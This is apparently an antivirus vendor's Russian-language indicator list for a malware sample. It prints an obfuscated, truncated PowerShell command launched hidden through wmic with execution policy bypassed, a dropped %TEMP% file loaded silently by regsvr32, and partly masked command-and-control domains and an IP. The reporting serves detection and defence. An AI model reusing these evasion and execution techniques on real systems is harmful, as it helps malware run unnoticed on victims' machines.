Техническая информация
- '<SYSTEM32>\wbem\wmic.exe' 'prOCeSS' cALL 'CrEaTe' "POWeRShell -EXECuTi byPASS -NOprO -WiNDo 000001 -NoninTerAc $D89 =([CHAR]34).ToStRiNG() ;$F2S = ([Char]44).TOSTRINg() ; & ( $shEllId[1]+$sHElLId[13]+'X')( "\"...
- %TEMP%\mirc741
- 'nr###dorc.com':443
- '17#.#28.83.136':443
- DNS ASK ro###orc.com
- DNS ASK nr###dorc.com
- '<SYSTEM32>\wbem\wmic.exe' 'prOCeSS' cALL 'CrEaTe' "POWeRShell -EXECuTi byPASS -NOprO -WiNDo 000001 -NoninTerAc $D89 =([CHAR]34).ToStRiNG() ;$F2S = ([Char]44).TOSTRINg() ; & ( $shEllId[1]+$sHElLId[13]+'X')( "\"...' (со скрытым окном)
- '<SYSTEM32>\regsvr32.exe' -s %TEMP%\mirc741.